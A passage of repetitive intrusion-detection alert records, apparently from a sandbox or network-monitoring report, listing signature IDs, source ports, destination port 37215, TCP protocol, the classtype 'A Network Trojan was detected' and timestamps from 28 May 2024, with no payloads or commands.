          SID:2829579
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812732
          SID:2829579
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484310
          SID:2835222
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795245
          SID:2829579
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608793
          SID:2835222
          Source Port:34646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660401
          SID:2835222
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989052
          SID:2835222
          Source Port:34648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845092
          SID:2829579
          Source Port:42772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480115
          SID:2829579
          Source Port:49160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060252
          SID:2829579
          Source Port:44878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977381
          SID:2829579
          Source Port:40180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373620
          SID:2835222
          Source Port:60724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933400
          SID:2835222
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300316
          SID:2835222
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543319
          SID:2835222
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650077
          SID:2829579
          Source Port:46060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922456
          SID:2835222
          Source Port:39264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613819
          SID:2835222
          Source Port:58868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235755
          SID:2829579
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162314
          SID:2829579
          Source Port:59290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326725
          SID:2835222
          Source Port:60956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962872
          SID:2835222
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213509
          SID:2835222
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195598
          SID:2835222
          Source Port:51754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462992
          SID:2835222
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797130
          SID:2835222
          Source Port:35452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848294
          SID:2829579
          Source Port:34574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984941
          SID:2835222
          Source Port:55952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087771
          SID:2835222
          Source Port:50654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117105
          SID:2829579
          Source Port:56020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946630
          SID:2829579
          Source Port:50762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131627
          SID:2829579
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280795
          SID:2829579
          Source Port:49100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464107
          SID:2835222
          Source Port:52716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743703
          SID:2835222
          Source Port:50990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944036
          SID:2829579
          Source Port:36982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298145
          SID:2835222
          Source Port:35708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840586
          SID:2835222
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039217
          SID:2835222
          Source Port:36586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768698
          SID:2829579
          Source Port:53722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.378877
          SID:2829579
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020477
          SID:2835222
          Source Port:41556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819420
          SID:2829579
          Source Port:51340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183153
          SID:2835222
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319116
          SID:2835222
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337858
          SID:2835222
          Source Port:45506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224868
          SID:2829579
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025864
          SID:2835222
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228458
          SID:2829579
          Source Port:56816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.412726
          SID:2829579
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125792
          SID:2835222
          Source Port:59170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550369
          SID:2829579
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176237
          SID:2835222
          Source Port:53536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434813
          SID:2829579
          Source Port:33680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087759
          SID:2835222
          Source Port:60090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.240262
          SID:2829579
          Source Port:50816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689500
          SID:2829579
          Source Port:50466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861569
          SID:2829579
          Source Port:47288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196792
          SID:2835222
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484124
          SID:2829579
          Source Port:41328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838785
          SID:2835222
          Source Port:51052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974934
          SID:2829579
          Source Port:34066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550383
          SID:2829579
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411984
          SID:2829579
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528932
          SID:2835222
          Source Port:55530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998746
          SID:2835222
          Source Port:57902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176821
          SID:2829579
          Source Port:43944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102800
          SID:2829579
          Source Port:57810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737911
          SID:2835222
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266185
          SID:2835222
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633384
          SID:2835222
          Source Port:48576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532923
          SID:2835222
          Source Port:42068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.739085
          SID:2829579
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605914
          SID:2829579
          Source Port:56154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228001
          SID:2835222
          Source Port:34192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488795
          SID:2829579
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713424
          SID:2835222
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838503
          SID:2835222
          Source Port:39284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878695
          SID:2829579
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143446
          SID:2835222
          Source Port:58432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048630
          SID:2829579
          Source Port:39642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115536
          SID:2829579
          Source Port:35250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890073
          SID:2829579
          Source Port:34436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894068
          SID:2829579
          Source Port:43570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796493
          SID:2829579
          Source Port:56692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342322
          SID:2829579
          Source Port:55594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868441
          SID:2829579
          Source Port:44450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.175499
          SID:2835222
          Source Port:35498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338098
          SID:2835222
          Source Port:42062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.157137
          SID:2835222
          Source Port:32772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299283
          SID:2829579
          Source Port:46844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439400
          SID:2829579
          Source Port:50018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066207
          SID:2835222
          Source Port:42960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484918
          SID:2835222
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269864
          SID:2835222
          Source Port:44414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815887
          SID:2829579
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265796
          SID:2835222
          Source Port:59468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652463
          SID:2835222
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476616
          SID:2835222
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924101
          SID:2829579
          Source Port:51784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543644
          SID:2829579
          Source Port:34468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565163
          SID:2835222
          Source Port:54988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299493
          SID:2835222
          Source Port:36364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328799
          SID:2835222
          Source Port:41518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244819
          SID:2829579
          Source Port:39780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859063
          SID:2829579
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550115
          SID:2835222
          Source Port:45278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156629
          SID:2835222
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196202
          SID:2835222
          Source Port:56740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283685
          SID:2829579
          Source Port:38684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528218
          SID:2835222
          Source Port:51950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159141
          SID:2835222
          Source Port:56986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.224275
          SID:2835222
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061265
          SID:2829579
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267688
          SID:2835222
          Source Port:45176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513309
          SID:2829579
          Source Port:54488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938527
          SID:2835222
          Source Port:57484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986183
          SID:2829579
          Source Port:41800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652276
          SID:2829579
          Source Port:43752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663288
          SID:2835222
          Source Port:36260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.690404
          SID:2835222
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325377
          SID:2829579
          Source Port:46666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726985
          SID:2829579
          Source Port:43178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976626
          SID:2835222
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177526
          SID:2829579
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328069
          SID:2835222
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998418
          SID:2829579
          Source Port:51648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815704
          SID:2835222
          Source Port:35938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341730
          SID:2835222
          Source Port:42408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151173
          SID:2829579
          Source Port:42384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176695
          SID:2829579
          Source Port:40706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305169
          SID:2829579
          Source Port:52468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138214
          SID:2835222
          Source Port:40926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171848
          SID:2829579
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214824
          SID:2835222
          Source Port:37454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684989
          SID:2835222
          Source Port:58808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298862
          SID:2835222
          Source Port:49096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331588
          SID:2829579
          Source Port:33908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711602
          SID:2829579
          Source Port:59266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710642
          SID:2829579
          Source Port:39216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466589
          SID:2835222
          Source Port:60790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847829
          SID:2835222
          Source Port:59516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219601
          SID:2835222
          Source Port:45852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177550
          SID:2835222
          Source Port:39682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115691
          SID:2829579
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973171
          SID:2835222
          Source Port:33268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287361
          SID:2835222
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911207
          SID:2835222
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045690
          SID:2829579
          Source Port:40542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117156
          SID:2835222
          Source Port:36264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958990
          SID:2835222
          Source Port:43756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874000
          SID:2835222
          Source Port:33066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528066
          SID:2835222
          Source Port:56170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183402
          SID:2829579
          Source Port:33440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535241
          SID:2829579
          Source Port:60000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846336
          SID:2829579
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235812
          SID:2835222
          Source Port:42122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268806
          SID:2835222
          Source Port:46394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328929
          SID:2835222
          Source Port:33966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266503
          SID:2829579
          Source Port:60792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415810
          SID:2829579
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857677
          SID:2835222
          Source Port:39648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206254
          SID:2829579
          Source Port:39794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551185
          SID:2829579
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807300
          SID:2829579
          Source Port:47314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600841
          SID:2835222
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943386
          SID:2835222
          Source Port:48704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807189
          SID:2835222
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949426
          SID:2835222
          Source Port:36070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247185
          SID:2835222
          Source Port:51144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025823
          SID:2835222
          Source Port:41764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542141
          SID:2835222
          Source Port:41868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535714
          SID:2835222
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628789
          SID:2835222
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742350
          SID:2835222
          Source Port:59292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680361
          SID:2835222
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.037735
          SID:2835222
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223161
          SID:2829579
          Source Port:56390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208320
          SID:2835222
          Source Port:51604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.589097
          SID:2835222
          Source Port:50860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117247
          SID:2835222
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205623
          SID:2835222
          Source Port:41440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064436
          SID:2829579
          Source Port:60192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080875
          SID:2829579
          Source Port:44916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656646
          SID:2835222
          Source Port:36926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367097
          SID:2835222
          Source Port:47762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463475
          SID:2835222
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744394
          SID:2835222
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298744
          SID:2829579
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766710
          SID:2829579
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331510
          SID:2835222
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811326
          SID:2835222
          Source Port:45564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.279657
          SID:2829579
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482864
          SID:2835222
          Source Port:34284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885992
          SID:2829579
          Source Port:37764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206941
          SID:2835222
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614675
          SID:2835222
          Source Port:58624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991099
          SID:2835222
          Source Port:49204
          Destination Port:37215
